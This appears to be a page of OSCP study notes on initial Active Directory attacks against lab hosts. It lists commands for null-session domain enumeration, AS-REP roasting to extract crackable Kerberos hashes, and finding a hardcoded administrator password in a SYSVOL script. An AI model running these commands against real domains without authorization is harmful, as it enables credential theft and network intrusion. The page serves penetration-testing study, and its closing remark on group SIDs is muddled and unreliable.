// notes/ Active Directory
🏛️

Initial Attack Strategy Misc

Pull a lot of information out of the Domain Controller using enum4linux

#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_misc

Misc

Enum4linux

Pull a lot of information out of the Domain Controller using enum4linux

bash
$enum4linux 10.10.10.161

Password Policy enumeration

bash
$crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol
<figure><img src="/files/2QSF2YIVuErrGHo2cnIl" alt=""><figcaption></figcaption></figure>

{% hint style="info" %} Put in the report that null authentication allows for domain enumeration {% endhint %}

RPCClient

bash
$rpcclient -U '' -N 10.10.10.161
$enumdomusers
$queryusergroups [rid]
$queryuser [rid]
$querygroup [rid]

GetNPUsers

Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking

bash
$impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcat
<figure><img src="/files/6dxnODrDYcSerCzUC7qg" alt=""><figcaption></figcaption></figure>
bash
$hashcat --example-hashes | grep -i krb
$hashcat --example-hashes | less

Credentials inside SYSVOL

Credentials may be stored inside of a script in the SYSVOL of the domain controller. Can happen on old AD environments.

Anyone with domain credentials can access the SYSVOL. To assign default local admin credentials LAPS is now used instead of scripts via Group Policy

code
01dir \\conda.local\SYSVOL\conda.local

Example path: \\conda.local\SYSVOL\conda.local\Policies{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1

code
01C:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
02type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
03$computer=$env:computername
04$user = "Administrator"
05$Password = "DefaultAdminPass1!"
06$user = [adsi]"WinNT://$computer/$user,user"
07$user.SetPassword($Password)
08net user administrator /active:yes

SMB and RPC Null Authentication

code
01smbclient -L \\\\10.10.10.100\\ -U '' -N
code
01rpcclient -U '' -N 10.10.10.169

Notes

{% hint style="info" %} If the SID of a group is more than 500 or above 1000 then it is not a default Windows group and was created {% endhint %}